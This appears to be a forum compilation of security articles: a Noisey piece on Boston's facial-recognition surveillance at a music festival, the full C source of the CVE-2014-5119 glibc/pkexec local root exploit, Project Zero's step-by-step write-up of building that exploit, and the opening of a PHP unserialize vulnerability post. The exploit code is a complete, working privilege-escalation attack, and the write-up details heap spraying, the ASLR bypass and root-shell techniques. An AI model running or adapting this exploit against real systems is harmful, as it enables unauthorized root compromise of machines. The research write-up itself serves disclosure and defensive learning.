The idea is simple logistics, they say. Nothing to worry about here. "The purpose of the pilot was to evaluate software that could make it easier for the City to host large, public events, looking at challenges such as permitting, basic services, crowd and traffic management, public safety, and citizen engagement through social media and other channels. These were technology demonstrations utilizing pre-existing hardware (cameras) and data storage systems," it read in part. "The City of Boston did not pursue long-term use of this software or enter into a contract to utilize this software on a permanent basis," it goes on. But, it says, they remain open to the potential for other similar situations. Among their concerns, they say, are legal and privacy issues. Oh, you think?

[Image: Demo of IBM software detecting a person of interest.]

Even those who might not begrudge a city for keeping an alert eye on a big event like a music festival, particularly coming on the heels of a terrorist attack, can likely agree that the real concern is what happens with the data after it's been determined to be of no use. You don't have to be overly paranoid to suspect, as we've seen with the NSA revelations uncovered by Edward Snowden, that once data is collected, it isn't often deleted. In fact, Lipp says, he was able to uncover 70 hours of footage from the concert still online up until last week, when they published their story.
Similarly, he's easily found his way into lightly secured reams of documents that include Boston parking permit info, including drivers' licenses, addresses, and other data, kept online on unsecured FTP servers. "If I were a different kind of actor, a malicious state actor, I could pose a significant threat to the people of Boston because of what I have in the folder."

"It's an astounding level of stupidity as far as IBM's control over the data," Crockford says. "When we're talking about numerous government agencies having access to this, as well as corporations, whether they're contractors, or ones that sit next to police officers at so-called fusion centers, we really have to be concerned. How many people have access to this server on which all this data sits?"

It's not as if law enforcement in Boston has shown the best judgment when it comes to the type of people being observed. Earlier this summer, over a thousand pages of notes compiled by the Boston Regional Intelligence Center on the activities of Occupy Boston members were uncovered, including absurdly minute details such as the comings and goings of local bands, down to the ticket prices of shows. You may also recall when authorities in Boston were going undercover online, pretending to be punk rock fans in order to smoke out the locations of DIY house shows, or "concerts."

Even worse, all of this was done in secret. "The city did nothing to disclose this; there were no city council hearings to ask whether it should be done," Crockford says of the facial recognition tests. "It's perfectly demonstrative of how surveillance policy manifests, with government agencies deciding behind closed doors to spend a lot of money spying on innocent people, and nobody is told about it."

It's enough to make one wonder what else is going on that we don't know about. Personally, I can't help but be curious how many times I showed up on the cameras myself at the concerts, moving throughout the grounds.
Did they watch me dancing to Passion Pit, or swooning to Marina and the Diamonds? And for what? What is it that made me and everyone else there a person of interest to the city of Boston, other than our desire to come together with the rest of the city to enjoy a day of music?

Following a few of the worst days in this city's history, we were treated to one of the funner ones of the year at Boston Calling, but the fact that we were all being spied on at the time has spoiled my memory of even that. It's made all the worse because a big reason why we go to concerts in the first place is to be able to divest ourselves of our identities, to lose ourselves, literally and figuratively speaking, in the throng of the crowd. That's starting to seem less possible every passing day.

Luke O'Neil is on Twitter, where his tweets are being monitored. - @lukeoneil47

Sursa: Beantown's Big Brother: How Boston Police Used Facial Recognition Technology to Spy on Thousands of Music Festival Attendees | NOISEY
-
[h=1]glibc Off-by-One NUL Byte gconv_translit_find Exploit[/h]

// Full Exploit: http://www.exploit-db.com/sploits/CVE-2014-5119.tar.gz
//
// ---------------------------------------------------
// CVE-2014-5119 glibc __gconv_translit_find() exploit
// ------------------------ taviso & scarybeasts -----
//
// Tavis Ormandy <taviso@cmpxhg8b.com>
// Chris Evans <scarybeasts@gmail.com>
//
// Monday 25th August, 2014
//
#define _GNU_SOURCE
#include <err.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <dlfcn.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <stdint.h>
#include <assert.h>
#include <stdarg.h>
#include <stddef.h>
#include <signal.h>
#include <string.h>
#include <termios.h>
#include <stdbool.h>
#include <sys/user.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/utsname.h>
#include <sys/resource.h>

// Minimal environment to trigger corruption in __gconv_translit_find().
static char * const kCorruptCharsetEnviron[] = {
    "CHARSET=//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
    NULL,
};

static const struct rlimit kRlimMax = {
    .rlim_cur = RLIM_INFINITY,
    .rlim_max = RLIM_INFINITY,
};

static const struct rlimit kRlimMin = {
    .rlim_cur = 1,
    .rlim_max = 1,
};

// A malloc chunk header.
typedef struct {
    size_t prev_size;
    size_t size;
    uintptr_t fd;
    uintptr_t bk;
    uintptr_t fd_nextsize;
    uintptr_t bk_nextsize;
} mchunk_t;

// A tls_dtor_list node.
typedef struct {
    uintptr_t func;
    uintptr_t obj;
    uintptr_t map;
    uintptr_t next;
} dlist_t;

// The known_trans structure glibc uses for transliteration modules.
typedef struct {
    uint8_t info[32];
    char *fname;
    void *handle;
    int open_count;
} known_t;

enum {
    LOG_DEBUG,
    LOG_WARN,
    LOG_ERROR,
    LOG_FATAL,
};

// Round up an integer to the next PAGE_SIZE boundary.
static inline uintptr_t next_page_size(uintptr_t size)
{
    return (size + PAGE_SIZE - 1) & PAGE_MASK;
}

// Allocate a buffer of specified length, starting with s, containing c, terminated with t.
static void * alloc_repeated_string(size_t length, int s, int c, int t)
{
    return memset(memset(memset(malloc(length), t, length), c, length - 1), s, 1);
}

static void logmessage(int level, const char * format, ...)
{
    va_list ap;

    switch (level) {
        case LOG_DEBUG:
            fprintf(stderr, " [*] ");
            break;
        case LOG_WARN:
            fprintf(stderr, " [*] ");
            break;
        case LOG_ERROR:
            fprintf(stderr, "[!] ");
            break;
    }

    va_start(ap, format);
    vfprintf(stderr, format, ap);
    va_end(ap);

    fputc('\n', stderr);

    if (level == LOG_ERROR) {
        _exit(EXIT_FAILURE);
    }
}

// Parse a libc malloc assertion message to extract useful pointers.
//
// Note, this isn't to defeat ASLR, it just makes it more portable across
// different system configurations. ASLR is already nullified using rlimits,
// although technically even that isn't necessary.
static int parse_fatal_error(uintptr_t *chunkptr, uintptr_t *baseaddr,
                             uintptr_t *bssaddr, uintptr_t *libcaddr)
{
    FILE *pty;
    char *mallocerror;
    char *memorymap;
    char *line;
    char *prev;
    char message[1 << 14];
    char *anon = NULL;
    char r, w, x, s;
    ssize_t count;
    int status;
    uintptr_t mapstart;
    uintptr_t mapend;

    // Unfortunately, glibc writes its error messages to /dev/tty. This cannot
    // be changed in setuid programs, so this wrapper catches tty output.
    while (true) {
        // Reset any previous output.
        memset(message, 0, sizeof message);

        logmessage(LOG_DEBUG, "Attempting to invoke pseudo-pty helper (this will take a few seconds)...");

        if ((pty = popen("./pty", "r")) == NULL) {
            logmessage(LOG_ERROR, "failed to execute pseudo-pty helper utility, cannot continue");
        }

        if ((count = fread(message, 1, sizeof message, pty)) <= 0) {
            logmessage(LOG_ERROR, "failed to read output from pseudo-pty helper, %d (%m)", count, message);
        }

        logmessage(LOG_DEBUG, "Read %u bytes of output from pseudo-pty helper, parsing...", count);

        pclose(pty);

        mallocerror = strstr(message, "corrupted double-linked list");
        memorymap = strstr(message, "======= Memory map: ========");

        // Unfortunately this isn't reliable, keep trying until it works.
        if (mallocerror == NULL || memorymap == NULL) {
            logmessage(LOG_WARN, "expected output missing (this is normal), trying again...");
            continue;
        }

        logmessage(LOG_DEBUG, "pseudo-pty helper succeeded");
        break;
    }

    *baseaddr = 0;
    *chunkptr = 0;
    *bssaddr = 0;
    *libcaddr = 0;

    logmessage(LOG_DEBUG, "attempting to parse libc fatal error message...");

    // Verify this is a message we understand.
    if (!mallocerror || !memorymap) {
        logmessage(LOG_ERROR, "unable to locate required error messages in crash dump");
    }

    // First, find the chunk pointer that malloc doesn't like.
    if (sscanf(mallocerror, "corrupted double-linked list: %p ***", chunkptr) != 1) {
        logmessage(LOG_ERROR, "having trouble parsing this error message: %.20s", mallocerror);
    };

    logmessage(LOG_DEBUG, "discovered chunk pointer from `%.20s...`, => %p", mallocerror, *chunkptr);
    logmessage(LOG_DEBUG, "attempting to parse the libc maps dump...");

    // Second, parse maps.
    for (prev = line = memorymap; line = strtok(line, "\n"); prev = line, line = NULL) {
        char filename[32];

        // Reset filename.
        memset(filename, 0, sizeof filename);

        // Just ignore the banner printed by glibc.
        if (strcmp(line, "======= Memory map: ========") == 0) {
            continue;
        }

        if (sscanf(line, "%08x-%08x %c%c%c%c %*8x %*s %*u %31s",
                   &mapstart, &mapend, &r, &w, &x, &s, filename) >= 1) {

            // Record the last seen anonymous map, in case the kernel didn't tag the heap.
            if (strlen(filename) == 0) {
                anon = line;
            }

            // If the kernel did tag the heap, then everything is easy.
            if (strcmp(filename, "[heap]") == 0) {
                logmessage(LOG_DEBUG, "successfully located first morecore chunk w/tag @%p", mapstart);
                *baseaddr = mapstart;
            }

            // If it didn't tag the heap, then we need the anonymous chunk before the stack.
            if (strcmp(filename, "[stack]") == 0 && !*baseaddr) {
                logmessage(LOG_WARN, "no [heap] tag was found, using heuristic...");

                if (sscanf(anon, "%08x-%*08x %*c%*c%*c%*c %*8x %*s %*u %31s", baseaddr, filename) < 1) {
                    logmessage(LOG_ERROR, "expected to find heap location in line `%s`, but failed", anon);
                }

                logmessage(LOG_DEBUG, "located first morecore chunk w/o tag@%p", *baseaddr);
            }

            if (strcmp(filename, "/usr/lib/libc-2.18.so") == 0 && x == 'x') {
                logmessage(LOG_DEBUG, "found libc.so mapped @%p", mapstart);
                *libcaddr = mapstart;
            }

            // Try to find libc bss.
            if (strlen(filename) == 0 && mapend - mapstart == 0x102000) {
                logmessage(LOG_DEBUG, "expecting libc.so bss to begin at %p", mapstart);
                *bssaddr = mapstart;
            }

            continue;
        }

        logmessage(LOG_ERROR, "unable to parse maps line `%s`, quitting", line);
        break;
    }

    return (*chunkptr == 0 || *baseaddr == 0 || *bssaddr == 0 || *libcaddr == 0) ? 1 : 0;
}

static const size_t heap_chunk_start = 0x506c8008;
static const size_t heap_chunk_end = 0x506c8008 + (2 * 1024 * 1024);
static const size_t nstrings = 15840000;

// The offset into libc-2.18.so BSS of tls_dtor_list.
static const uintptr_t kTlsDtorListOffset = 0x12d4;

// The DSO we want to load as euid 0.
static const char kExploitDso[] = "./exploit.so";

int main(int argc, const char* argv[])
{
    uintptr_t baseaddr;
    uintptr_t chunkptr;
    uintptr_t bssaddr;
    uintptr_t libcaddr;
    uint8_t *param;
    char **args;
    dlist_t *chain;
    struct utsname ubuf;

    // Look up host type.
    if (uname(&ubuf) != 0) {
        logmessage(LOG_ERROR, "failed to query kernel information");
    }

    logmessage(LOG_DEBUG, "---------------------------------------------------");
    logmessage(LOG_DEBUG, "CVE-2014-5119 glibc __gconv_translit_find() exploit");
    logmessage(LOG_DEBUG, "------------------------ taviso & scarybeasts -----");

    // Print some warning that this isn't going to work on Ubuntu.
    if (access("/etc/fedora-release", F_OK) != 0 || strcmp(ubuf.machine, "i686") != 0)
        logmessage(LOG_WARN, "This proof of concept is designed for 32 bit Fedora 20");

    // Extract some useful pointers from glibc error output.
    if (parse_fatal_error(&chunkptr, &baseaddr, &bssaddr, &libcaddr) != 0) {
        logmessage(LOG_ERROR, "unable to parse libc fatal error message, please try again.");
    }

    logmessage(LOG_DEBUG, "allocating space for argument structure...");

    // This number of "-u" arguments is used to spray the heap.
    // Each value is a 59-byte string, leading to a 64-byte heap chunk, leading to a stable heap pattern.
    // The value is just large enough to usually crash the heap into the stack without going OOM.
    if ((args = malloc(((nstrings * 2 + 3) * sizeof(char *)))) == NULL) {
        logmessage(LOG_ERROR, "allocating argument structure failed");
    }

    logmessage(LOG_DEBUG, "creating command string...");

    args[nstrings * 2 + 1] = alloc_repeated_string(471, '/', 1, 0);
    args[nstrings * 2 + 2] = NULL;

    logmessage(LOG_DEBUG, "creating a tls_dtor_list node...");

    // The length 59 is chosen to cause a 64byte allocation by strdup. That is
    // a 60 byte nul-terminated string, followed by 4 bytes of metadata.
    param = alloc_repeated_string(59, 'A', 'A', 0);
    chain = (void *) param;

    logmessage(LOG_DEBUG, "open_translit() symbol will be at %p", libcaddr + _OPEN_TRANSLIT_OFF);
    logmessage(LOG_DEBUG, "offsetof(struct known_trans, fname) => %u", offsetof(known_t, fname));

    chain->func = libcaddr + _OPEN_TRANSLIT_OFF;
    chain->obj = baseaddr + 8 + sizeof(*chain) - 4 - offsetof(known_t, fname);
    chain->map = baseaddr + 8 + sizeof(*chain);
    chain->next = baseaddr + 8 + 59 - strlen(kExploitDso);

    logmessage(LOG_DEBUG, "appending `%s` to list node", kExploitDso);

    memcpy(param + 59 - strlen(kExploitDso), kExploitDso, 12);

    logmessage(LOG_DEBUG, "building parameter list...");

    for (int i = 0; i < nstrings; ++i) {
        args[i*2 + 1] = "-u";
        args[i*2 + 2] = (void *) chain;
    }

    // Verify we didn't sneak in a NUL.
    assert(memchr(chain, 0, sizeof(chain)) == NULL);

    logmessage(LOG_DEBUG, "anticipating tls_dtor_list to be at %p", bssaddr + kTlsDtorListOffset);

    // Spam all of possible chunks (some are unfortunately missed).
    for (int i = 0; true; i++) {
        uintptr_t chunksize = 64;
        uintptr_t chunkaddr = baseaddr + i * chunksize;
        uintptr_t targetpageoffset = chunkptr & ~PAGE_MASK;
        uintptr_t chunkpageoffset = PAGE_MASK;
        uintptr_t mmapbase = 31804 + ((0xFD8 - targetpageoffset) / 32);
        uint8_t *param = NULL;
        mchunk_t chunk = {
            .prev_size = 0xCCCCCCCC,
            .size = 0xDDDDDDDD,
            .fd_nextsize = bssaddr + kTlsDtorListOffset - 0x14,
            .bk_nextsize = baseaddr + 8,
        };

        // Compensate for heap metadata every 1MB of allocations.
        chunkaddr += 8 + (i / (1024 * 1024 / chunksize - 1) * chunksize);

        if (chunkaddr < heap_chunk_start)
            continue;
        if (chunkaddr > heap_chunk_end)
            break;

        chunkpageoffset = chunkaddr & ~PAGE_MASK;

        if (chunkpageoffset > targetpageoffset) {
            continue;
        }

        if (targetpageoffset - chunkpageoffset > chunksize) {
            continue;
        }

        // Looks like this will fit, compensate the pointers for alignment.
        chunk.fd = chunk.bk = chunkaddr + (targetpageoffset - chunkpageoffset);

        if (memchr(&chunk, 0, sizeof chunk)) {
            logmessage(LOG_WARN, "parameter %u would contain a nul, skipping", i);
            continue;
        }

        args[mmapbase + i * 2] = param = alloc_repeated_string(60, 'A', 'A', 0);

        memcpy(param + (targetpageoffset - chunkpageoffset), &chunk, sizeof chunk);
    }

    setrlimit(RLIMIT_STACK, &kRlimMax);
    setrlimit(RLIMIT_DATA, &kRlimMin);

    args[0] = "pkexec";

    logmessage(LOG_DEBUG, "execvpe(%s...)...", args[0]);

    execvpe("pkexec", args, kCorruptCharsetEnviron);
}

Source: glibc Off-by-One NUL Byte gconv_translit_find Exploit
-
The poisoned NUL byte, 2014 edition
Posted by Chris Evans, Exploit Writer Underling to Tavis Ormandy

Back in this 1998 post to the Bugtraq mailing list, Olaf Kirch outlined an attack he called “The poisoned NUL byte”. It was an off-by-one error leading to writing a NUL byte outside the bounds of the current stack frame. On i386 systems, this would clobber the least significant byte (LSB) of the “saved %ebp”, leading eventually to code execution. Back at the time, people were surprised and horrified that such a minor error and corruption could lead to the compromise of a process.

Fast forward to 2014. Well over a month ago, Tavis Ormandy of Project Zero disclosed a glibc NUL byte off-by-one overwrite into the heap. Initial reaction was skepticism about the exploitability of the bug, on account of the malloc metadata hardening in glibc. In situations like this, the Project Zero culture is to sometimes “wargame” the situation. geohot quickly coded up a challenge and we were able to gain code execution. Details are captured in our public bug. This bug contains analysis of a few different possibilities arising from an off-by-one NUL overwrite, a solution to the wargame (with comments), and of course a couple of different variants of a full exploit (with comments) for a local Linux privilege escalation.

Inspired by the success of the wargame, I decided to try and exploit a real piece of software. I chose the “pkexec” setuid binary as used by Tavis to demonstrate the bug. The goal is to attain root privilege escalation. Outside of the wargame environment, it turns out that there are a series of very onerous constraints that make exploitation hard. I did manage to get an exploit working, though, so read on to see how.

Step 1: Choose a target distribution

I decided to develop against Fedora 20, 32-bit edition. Why the 32-bit edition? I'm not going to lie: I wanted to give myself a break.
I was expecting this to be pretty hard, so going after the problem in the 32-bit space gives us just a few more options in our trusty exploitation toolkit.

Why Fedora and not, say, Ubuntu? Both ship pkexec by default. Amusingly, Ubuntu has deployed the fiendish mitigation called the “even path prefix length” mitigation. Kudos! More seriously, there is a malloc() that is key to the exploit, in gconv_trans.c:__gconv_translit_find():

newp = (struct known_trans *) malloc (sizeof (struct known_trans)
                                      + (__gconv_max_path_elem_len
                                         + name_len + 3)
                                      + name_len);

If __gconv_max_path_elem_len is even, then the malloc() size will be odd. An odd malloc() size will always result in an off-by-one off the end being harmless, due to malloc() minimum alignment being sizeof(void*). On Fedora, __gconv_max_path_elem_len is odd due to the value being /usr/lib/gconv/ (15) or /usr/lib64/gconv/ (17). There are various unexplored avenues to try and influence this value on Ubuntu, but for now we choose to proceed on Fedora.

Step 2: Bypass ASLR

Let's face it, ASLR is a headache. On Fedora 32-bit, the pkexec image, the heap and the stack are all randomized, including relative to each other, e.g.:

b772e000-b7733000 r-xp 00000000 fd:01 4650 /usr/bin/pkexec
b8e56000-b8e77000 rw-p 00000000 00:00 0 [heap]
bfbda000-bfbfb000 rw-p 00000000 00:00 0 [stack]

There is often a way to defeat ASLR, but as followers of the path of least resistance, what if we could just bypass it altogether? Well, what happens if we run pkexec again after running the shell commands ulimit -s unlimited and ulimit -d 1? These altered limits to stack and data sizes are inherited across processes, even setuid ones:

40000000-40005000 r-xp 00000000 fd:01 9909 /usr/bin/pkexec
406b9000-407bb000 rw-p 00000000 00:00 0 /* mmap() heap */
bfce5000-bfd06000 rw-p 00000000 00:00 0 [stack]

This is much better. The pkexec image and libraries, as well as the heap, are now in static locations.
The stack still moves around, with about 8MB variation (or 11 bits of entropy if you prefer), but we already know static locations for both code and data without needing to know the exact location of the stack.

(For those curious about the effect of these ulimits on 64-bit ASLR, the situation isn't as bad there. The binary locations remain well randomized. The data size trick is still very useful, though: the heap goes from a random location relative to the binary, to a static offset relative to the binary. This represents a significant reduction in entropy for some brute-force scenarios.)

Step 3: Massage the heap using just command line arguments and the environment

After significant experimentation, our main heap massaging primitive is to call pkexec with a path comprising of '/' followed by 469 '1' characters. This path does not exist, so an error message including this path is built. The eventual error message string is a 508-byte allocation, occupying a 512-byte heap chunk on account of 4 bytes of heap metadata.

The error message is built using an algorithm that starts with a 100-byte allocation. If the allocation is not large enough, it is doubled in size, plus 100 bytes, and the old allocation is freed after a suitable copy. The final allocation is shrunk to precise size using realloc. Running the full sequence through for our 508-byte string, we see the following heap API calls:

malloc(100), malloc(300), free(100), malloc(700), free(300), realloc(508)

By the time we get to this sequence, we've filled up all the heap “holes” so that these allocations occur at the end of the heap, leading to this heap layout at the end of the heap (where “m” means metadata; the metadata word just before the error message is where the corruption will occur):

| free space: 100 |m| free space: 300 |m| error message: 508 bytes |

In fact, the heap algorithm will have coalesced the 100 and 300 bytes of free space. Next, the program proceeds to consider character set conversion for the error message.
This is where the actual NUL byte heap overflow occurs, due to our CHARSET=//AAAAA… environment variable. Leading up to this, a few small allocations outside of our control occur. That's fine; they stack up at the beginning of the coalesced free space. An allocation based on our CHARSET environment variable now occurs. We choose the number of A's in our value to cause an allocation of precisely 236 bytes, which perfectly fills the remaining space in the 400 bytes of free space. The situation now looks like this:

| blah |m| blah |m| charset derived value: 236 bytes |m: 0x00000201| error message: 508 bytes |

The off-by-one NUL byte heap corruption now occurs. It will clobber the LSB of the metadata word that precedes the error message allocation. The format of metadata is a size word, with a couple of flags in the two least significant bits. The flag 0x1, which is set, indicates that the previous buffer, the charset derived value, is in use. The size is 0x200, or 512 bytes. This size represents the 508 bytes of the following allocation plus 4 bytes of metadata.

The size and flag values at this time are very specifically chosen so that the single NUL byte overflow only has the effect of clearing the 0x1 in-use flag. The size is unchanged, which is important later when we need to not break forward coalescing during free().

Step 4: Despair

The fireworks kick off when the error message is freed as the program exits. We have corrupted the preceding metadata to make it look like the previous heap chunk is free when in fact it is not. Since the previous chunk looks free, the malloc code attempts to coalesce it with the current chunk being freed. When a chunk is free, the last 4 bytes represent the size of the free chunk. But the chunk is not really free; so what does it contain as its last 4 bytes? Those bytes will be interpreted as a size.
It turns out that as an attacker, we have zero control over these last 4 bytes: they are always 0x6f732e00, or the string “.so” preceded by a NUL byte. Obviously, this is a very large size. And unfortunately it is used as an index backwards in memory in order to find the chunk header structure for the previous chunk. Since our heap is in the 0x40000000 range, subtracting 0x6f732e00 ends us up in the 0xd0000000 range. This address is in kernel space, so when we dereference it as a chunk header structure, we get a crash and our exploitation dreams go up in smoke.

At this juncture, we consider alternate heap metadata corruption situations, in the hope we will find a situation where we have more control:

- Forward coalescing of free heap chunks. If we cause the same corruption as described above, but arrange to free the chunk preceding the overflowed chunk, we follow a different code path. It results in the beginning of the 236-byte allocation being treated as a pair of freelist pointers for a linked list operation. This sounds initially promising, but again, we do not seem to have full control over these values. In particular, the second freelist pointer comes out as NULL (guaranteed crash) and it is not immediately obvious how to overlap a non-NULL value there.

- Overflowing into a free chunk. This opens up a whole range of possibilities. Unfortunately, our overflow is a NUL byte so we can only make free chunks smaller and not bigger, which is a less powerful primitive. But we can again cause confusion as to the location of heap metadata headers. See “shrink_free_hole_consolidate_backward.c” in our public bug. Again, we are frustrated because we do not have obvious control over the first bytes of any malloc() object that might get placed into the free chunk after we have corrupted the following length.

- Overflowing into a free chunk and later causing multiple pointers to point to the same memory.
This powerful technique is covered in “shrink_free_hole_alloc_overlap_consolidate_backward.c” in our public bug. I didn't investigate this path because the required precise sequence of heap operations did not seem readily possible. Also, the memory corruption occurs after the process has hit an error and is heading towards exit(), so taking advantage of pointers to overlapping memory will be hard.

At this stage, things are looking bad for exploitation.

Step 5: Aha! Use a command-line argument spray to effect a heap spray and collide the heap into the stack

The breakthrough to escape the despair of step 4 comes when we discover a memory leak in the pkexec program; from pkexec.c:

else if (strcmp (argv[n], "--user") == 0 || strcmp (argv[n], "-u") == 0)
  {
    n++;
    if (n >= (guint) argc)
      {
        usage (argc, argv);
        goto out;
      }
    opt_user = g_strdup (argv[n]);
  }

This is very useful! If we specify multiple “-u” command line arguments, then we will spray the heap, because setting a new opt_user value does not consider freeing the old one. Furthermore, we observe that modern Linux kernels permit a very large number of command-line arguments to be passed via execve(), with each one able to be up to 32 pages long.

We opt to pass a very large number (15 million+) of “-u” command line argument values, each a string of 59 bytes in length. 59 bytes plus a NUL terminator is a 60-byte allocation, which ends up being a 64-byte heap chunk when we include metadata. This number is important later. The effect of all these command line arguments is to bloat both the stack (which grows down) and the heap (which grows up) until they crash into each other. In response to this collision, the next heap allocations actually go above the stack, in the small space between the upper address of the stack and the kernel space at 0xc0000000.
We use just enough command line arguments so that we hit this collision, and allocate heap space above the stack, but do not quite run out of virtual address space -- this would halt our exploit! Once we've caused this condition, our tail-end mappings look a bit like this:

407c8000-7c7c8000 rw-p 00000000 00:00 0 /* mmap() based heap */
7c88e000-bf91c000 rw-p 00000000 00:00 0 [stack]
bf91c000-bff1c000 rw-p 00000000 00:00 0 /* another mmap() heap extent */

Step 6: Commandeer a malloc metadata chunk header

The heap corruption listed in step 3 now plays out in a heap extent that is past the stack. Why did we go to all this effort? Because it avoids the despair in step 4. The huge backwards index of 0x6f732e00 now results in an address that is mapped! Specifically, it will hit somewhere around the 0x50700000 range, squarely in the middle of our heap spray. We control the content at this address.

At this juncture, we encounter the first non-determinism in our exploit. This is of course a shame as we deployed quite a few tricks to avoid randomness. But, by placing a heap extent past the stack, we've fallen victim to stack randomization. That's one piece of randomization we were not able to bypass. By experimental determination, the top of the stack seems to range from 0xbf800000-0xbffff000, for 2048 (2^11) different possibilities with 4k (PAGE_SIZE) granularity.

A brief departure on exploit reliability. As we spray the heap, the heap grows in mmap() extents of size 1MB. There is no control over this. Therefore, there's a chance that the stack will randomly get mapped sufficiently high that a 1MB mmap() heap extent cannot fit above the stack. This will cause the exploit to fail about 1 in 8 times. Since the exploit is a local privilege escalation and takes just a few seconds, you can simply re-run it.

In order to get around this randomness, we cater for every possible stack location in the exploit.
The backwards index to a malloc chunk header will land at a specific offset into any one of 2048 different pages. So we simply forge a malloc chunk header at all of those locations. Whichever one hits by random, our exploit will continue in a deterministic manner by using the same path forward.

At this time, it's worth noting why we sprayed the heap with 59-byte strings. These end up spaced 64 bytes apart. Since 64 evenly divides PAGE_SIZE (4096), we end up with a very uniform heap spray pattern. This gives us two things: an easy calculation to map command line arguments to an address where the string will be placed in the heap, and a constant offset into the command line strings for where we need to place the forged heap chunk payload.

Step 7: Clobber the tls_dtor_list

So, we have now progressed to the point where we corrupt memory such that a free() call will end up using a faked malloc chunk header structure that we control. In order to further progress, we abuse freelist linked list operations to write a specific value to a specific address in memory. Let's have a look at the malloc.c code to remove a pointer from a doubly-linked freelist:

#define unlink(AV, P, BK, FD) { \
[...]
    if (__builtin_expect (FD->bk != P || BK->fd != P, 0)) { \
      mutex_unlock(&(AV)->mutex); \
      malloc_printerr (check_action, "corrupted double-linked list", P); \
      mutex_lock(&(AV)->mutex); \
    } else { \
      if (!in_smallbin_range (P->size) \
          && __builtin_expect (P->fd_nextsize != NULL, 0)) { \
        assert (P->fd_nextsize->bk_nextsize == P); \
        assert (P->bk_nextsize->fd_nextsize == P); \
        if (FD->fd_nextsize == NULL) { \
[...]
        } else { \
          P->fd_nextsize->bk_nextsize = P->bk_nextsize; \
          P->bk_nextsize->fd_nextsize = P->fd_nextsize; \
[...]

We see that the main doubly linked list is checked in a way that makes it hard for us to write to arbitrary locations. But the special doubly linked list for larger allocations has only some debug asserts for the same type of checks.
(Aside: there’s some evidence that Ubuntu glibc builds might compile these asserts in, even for release builds. Fedora certainly does not.) So we craft our fake malloc header structure so that the main forward and back pointers point back to itself, and so that the size is large enough to enter the secondary linked list mani****tion. This bypasses the main linked list corruption check, but allows us to provide arbitrary values for the secondary linked list. These arbitrary values let us write an arbitrary 4-byte value to an arbitrary 4-byte address, but with a very significant limitation: the value we write must itself be a valid writeable address, on account of the double linking of the linked list. i.e. after we write our arbitrary value of P->bk_nextsize to P->fd_nextsize, the value P->bk_nextsize is itself dereferenced and written to. This limitation does provide a headache. At this point in the process’ lifetime, it is printing an error message just before it frees a few things up and exits. There are not a huge number of opportunities to gain control of code execution, and our corruption primitive does not let us directly overwrite a function pointer with another, different pointer to code. To get around this, we note that there are two important glibc static data structure pointers that indirectly control some code that gets run during the exit() process: __exit_funcs and tls_dtor_list. __exit_funcs does not work well for us because the structure contains an enum value that has to be some small number like 0x00000002 in order to be useful to us. It is hard for us to construct fake structures that contain NUL bytes in them because our building block is the NUL-terminated string. But tls_dtor_list is ideal for us. It is a singly linked list that runs at exit() time, and for every list entry, an arbitrary function pointer is called with an arbitrary value (which has to be a pointer due to previous contraints)! It’s an easy version of ROP. 
Step 8: Deploy a chroot() trick

For our first attempt to take control of the program, we simply call system("/bin/bash"). This doesn't work because this construct ends up dropping privileges. It is a bit disappointing to go to so much trouble to run arbitrary code, only to end up with a shell running at our original privilege level.

The deployed solution is to chain in a call to chroot() before the call to system(). This means that when system() executes /bin/sh, it will do so inside a chroot we have set up to contain our own /bin/sh program. Inside our fake /bin/sh, we will end up running with effective root privilege. So we switch to real root privilege by calling setuid(0) and then execute a real shell.

TL;DR: Done! We escalated from a normal user account to root privileges.

Step 9: Tea and medals; reflect

The main point of going to all this effort is to steer industry narrative away from quibbling about whether a given bug might be exploitable or not. In this specific instance, we took a very subtle memory corruption with poor levels of attacker control over the overflow, poor levels of attacker control over the heap state, poor levels of attacker control over important heap content and poor levels of attacker control over program flow. Yet still we were able to produce a decently reliable exploit! And there's a long history of this over the evolution of exploitation: proclamations of non-exploitability that end up being neither advisable nor correct. Furthermore, arguments over exploitability burn time and energy that could be better spent protecting users by getting on with shipping fixes.

Aside from fixing the immediate glibc memory corruption issue, this investigation led to additional observations and recommendations:

- Memory leaks in setuid binaries are surprisingly dangerous because they can provide a heap spray primitive. Fixing the pkexec memory leak is recommended.
- The ability to lower ASLR strength by running setuid binaries with carefully chosen ulimits is unwanted behavior. Ideally, setuid programs would not be subject to attacker-chosen ulimit values. There's a long history of attacks along these lines, such as this recent file size limit attack. Other unresolved issues include the ability to fail specific allocations or fail specific file opens via carefully chosen RLIMIT_AS or RLIMIT_NOFILE values.

- The exploit would have been complicated significantly if the malloc main linked list hardening was also applied to the secondary linked list for large chunks. Elevating the assert() to a full runtime check is recommended.

- We also noticed a few environment variables that give the attacker unnecessary options to control program behavior, e.g. G_SLICE letting the attacker control properties of memory allocation. There have been interesting historical instances where controlling such properties assisted exploitation, such as this traceroute exploit from 2000. We recommend closing these newer routes too.

I hope you enjoyed this write-up as much as I enjoyed developing the exploit! There's probably a simple trick that I've missed to make a much simpler exploit. If you discover that this is indeed the case, or if you pursue a 64-bit exploit, please get in touch! For top-notch work, we'd love to feature a guest blog post.

Source: Project Zero: The poisoned NUL byte, 2014 edition
-
SPL ArrayObject/SPLObjectStorage Unserialization Type Confusion Vulnerabilities

Posted: 2014-08-27 09:23 by Stefan Esser

Introduction

One month ago the PHP developers released security updates to PHP 5.4 and PHP 5.5 that fixed a number of vulnerabilities. A few of these vulnerabilities were discovered by us, and we already disclosed the less serious one in our previous blog post titled phpinfo() Type Confusion Infoleak Vulnerability and SSL Private Keys. We showed that this vulnerability allowed retrieving the SSL private key from Apache memory. However, we kept silent about two more serious type confusion vulnerabilities that were reachable through PHP's unserialize() function until the PHP team had the chance to not only fix PHP 5.4 and PHP 5.5 but also publish a final PHP 5.3 release, which fixes these vulnerabilities. Unlike the information leak disclosed before, these type confusions can lead to arbitrary remote code execution.

The PHP function unserialize() allows deserializing PHP variables that were previously serialized into a string representation by means of the serialize() function. Because of this it has traditionally been used by PHP application developers to transfer data between PHP applications on different servers, or as a compressed format to store some data client side, despite all warnings that this is potentially dangerous.

